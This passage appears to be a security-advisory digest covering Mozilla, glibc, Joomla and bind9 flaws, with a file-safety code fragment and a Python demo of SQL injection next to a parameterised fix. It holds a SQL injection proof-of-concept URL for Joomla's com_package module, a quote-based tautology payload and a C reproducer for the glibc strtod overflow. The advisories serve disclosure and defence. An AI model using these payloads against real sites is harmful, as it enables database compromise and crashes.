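        results["safe_target_is_regular_file"] = (
            not os.path.islink(target) and os.path.isfile(target)
        )
        with open(target) as fh:
            results["safe_target_content"] = fh.read()
    return results


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(f"{key}: {value}")
```

When the final name must be opened in place rather than renamed into, the same protection comes from opening with `O_CREAT | O_EXCL | O_NOFOLLOW`, which fails on any pre-existing entry instead of following it.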

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969

http://www.ubuntu.com/usn/usn-2077-1

Several Vulnerabilities in Mozilla Firefox, Thunderbird, Seamonkey

Updated software packages for Mozilla Firefox, Thunderbird and SeaMonkey that fix several recently discovered security issues are now available for nearly all operating systems and platforms.

You should upgrade your software immediately!

Patched and Secure Versions
If you are not using one of the versions below, you are vulnerable.

Firefox 18.0
Firefox ESR 10.0.12
Firefox ESR 17.0.2
Thunderbird 17.0.2
Thunderbird ESR 10.0.12
Thunderbird ESR 17.0.2
SeaMonkey 2.15

Related MFSAs

MFSA 2013-20
Mis-issued TURKTRUST certificates

MFSA 2013-19
Use-after-free in Javascript Proxy objects

MFSA 2013-18
Use-after-free in Vibrate

MFSA 2013-17
Use-after-free in ListenerManager

MFSA 2013-16
Use-after-free in serializeToStream

MFSA 2013-15
Privilege escalation through plugin objects

MFSA 2013-14
Chrome Object Wrapper (COW) bypass through changing prototype

MFSA 2013-13
Memory corruption in XBL with XML bindings containing SVG

MFSA 2013-12
Buffer overflow in Javascript string concatenation

MFSA 2013-11
Address space layout leaked in XBL objects

MFSA 2013-10
Event manipulation in plugin handler to bypass same-origin policy

MFSA 2013-09
Compartment mismatch with quickstubs returned values

MFSA 2013-08
AutoWrapperChanger fails to keep objects alive during garbage collection

MFSA 2013-07
Crash due to handling of SSL on threads

MFSA 2013-05
Use-after-free when displaying table with many columns and column groups

MFSA 2013-04
URL spoofing in addressbar during page loads

MFSA 2013-03
Buffer Overflow in Canvas

MFSA 2013-02
Use-after-free and buffer overflow issues found using Address Sanitizer

MFSA 2013-01
Miscellaneous memory safety hazards (rv:18.0/ rv:10.0.12 / rv:17.0.2)

MFSA 2012-98
Firefox installer DLL hijacking

Related CVEs:

91811 – CVE-2013-0769 Mozilla: Miscellaneous memory safety hazards (rv:10.0.12) (MFSA 2013-01)
891821 – CVE-2013-0762 CVE-2013-0766 CVE-2013-0767 Mozilla: Use-after-free & buffer overflow w/Address Sanitizer (MFSA 2013-02)
891824 – CVE-2013-0759 Mozilla: URL spoofing in addressbar during page loads (MFSA 2013-04)
891825 – CVE-2013-0744 Mozilla: Use-after-free when displaying table with many columns and column groups (MFSA 2013-05)
892142 – CVE-2013-0746 Mozilla: Compartment mismatch with quickstubs returned values (MFSA 2013-09)
892144 – CVE-2013-0748 Mozilla: Address space layout leaked in XBL objects (MFSA 2013-11)
892145 – CVE-2013-0750 Mozilla: Buffer overflow in Javascript string concatenation (MFSA 2013-12)
892148 – CVE-2013-0758 Mozilla: Chrome Object Wrapper (COW) bypass through plugin objects (MFSA 2013-15)
892149 – CVE-2013-0753 Mozilla: Use-after-free in serializeToStream (MFSA 2013-16)
892150 – CVE-2013-0754 Mozilla: Use-after-free in ListenerManager (MFSA 2013-17)

References:
http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
https://rhn.redhat.com/errata/RHSA-2013-0144.html
https://rhn.redhat.com/errata/RHSA-2013-0145.html

CVE-2012-3480: glibc overflow vulnerability

This issue affects the versions of the glibc package, as shipped with RHEL 5 and 6 and Fedora 16, 17.

Note: this was just reported and an official patch from RHEL is not yet available.

Vulnerability details

Multiple integer overflows, leading to stack-based buffer overflows, were found in various stdlib functions of GNU libc (strtod, strtof, strtold, strtod_l and related routines). If an application using the affected stdlib functions did not perform its own sanitization of provided inputs, a local attacker could use this flaw to cause such an application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.

* Upstream bug report:
[1] http://sourceware.org/bugzilla/show_bug.cgi?id=14459

* Upstream patch (might not be the final one):
[2] http://sourceware.org/ml/libc-alpha/2012-08/msg00202.html

* References:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=847715

Sample reproducer from upstream bug

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364

int
main (void)
{
  /* Build "1", followed by SIZE zeros, followed by a huge negative exponent. */
  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
  if (p == NULL)
    {
      perror ("malloc");
      exit (EXIT_FAILURE);
    }
  p[0] = '1';
  memset (p + 1, '0', SIZE);
  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
  double d = strtod (p, NULL);
  printf ("%a\n", d);
  exit (EXIT_SUCCESS);
}

Reference: http://www.openwall.com/lists/oss-security/2012/08/13/4

2 Joomla SQL Injection Vulnerabilities Discovered

Two SQL injection vulnerabilities were recently detected in the com_package and com_photo modules of the Joomla Content Management System. Remote attackers and low-privileged user accounts can inject their own SQL commands to compromise the application database. In the com_package module the vulnerability is located in the bound id parameter. Successful exploitation results in compromise of the database (server) or the application (web).

com_package vulnerability:


Vulnerable Module(s):

  • index.php?option=com_package

Vulnerable Parameter(s):

  • id

com_photo vulnerability:

Vulnerable Module(s):

  • index.php?option=com_photo

Vulnerable Parameter(s):

  • AlbumId
  • key



Patching and Mitigation:

  • These exploits are in the early stages of discovery, and as such no vendor patches or fixes have been released at the present time. Updates will be posted when a patch or new release is available.

Proof of Concept:


The SQL injection vulnerabilities can be exploited by remote attackers without a privileged user account or any user interaction. For demonstration or reproduction …


Path: /
File: index.php
Module: ?option=com_package
Parameter: details&id=-1'[SQL Injection]--
URL: http://www.xxx.com/index.php?option=com_package&task=details&id=174-1'[SQL Injection]--
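The underlying defect is a request parameter spliced into SQL text, so a quote in `id` changes the query's structure; the fix is to validate the parameter's type and bind it as a value. The Python/sqlite3 script below is an added example, not Joomla's or the extension's code: it stands in for the PHP pattern with a constructed `packages` table (schema invented here) and shows the vulnerable handler beside a hardened one, using the same kind of quote-based input the advisory reports. Function and table names are this example's own.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory table standing in for an extension's table; the schema
    and rows are invented for this example, not Joomla's."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT, published INTEGER)"
    )
    conn.executemany("INSERT INTO packages VALUES (?, ?, ?)", [
        (1, "public-a", 1),
        (2, "public-b", 1),
        (3, "internal-draft", 0),   # should never be visible through the details view
    ])
    return conn


def details_vulnerable(conn, id_param):
    """Request parameter spliced into the SQL text: the bug class the advisory
    describes. A quote in id_param terminates the literal and the rest of the
    input becomes part of the WHERE clause."""
    sql = "SELECT id, name FROM packages WHERE published = 1 AND id = '%s'" % id_param
    return conn.execute(sql).fetchall()


def details_hardened(conn, id_param):
    """Validate the type, then bind the value. The parameter is sent to the engine
    as data, so it can no longer alter the query's structure."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT id, name FROM packages WHERE published = 1 AND id = ?", (id_value,)
    ).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    tautology = "-1' OR '1'='1"     # constructed input: closes the literal, adds OR
    print("vulnerable, id=2      ->", details_vulnerable(conn, "2"))
    print("vulnerable, tautology ->", details_vulnerable(conn, tautology))
    print("hardened,   id=2      ->", details_hardened(conn, "2"))
    try:
        details_hardened(conn, tautology)
    except ValueError as exc:
        print("hardened,   tautology -> rejected:", exc)
```

The vulnerable handler returns every row, including the unpublished one, because the injected `OR` short-circuits the `published = 1` filter; the hardened handler rejects the input before any SQL is built. The integer cast is the belt, the bound parameter is the braces: binding alone would already be safe for this query, but the cast also gives a clean error instead of an empty result for malformed ids.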

References:


http://www.vulnerability-lab.com/get_content.php?id=652
http://www.vulnerability-lab.com/get_content.php?id=654

bind9 denial of service (remote) (CVE-2012-3817)

Package : bind9
Vulnerability : denial of service
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-3817

Einar Lonn discovered that under certain conditions bind9, a DNS server,
may use cached data before initialization. As a result, an attacker can
trigger an assertion failure on servers under high query load that do
DNSSEC validation.

We recommend that you upgrade your bind9 packages.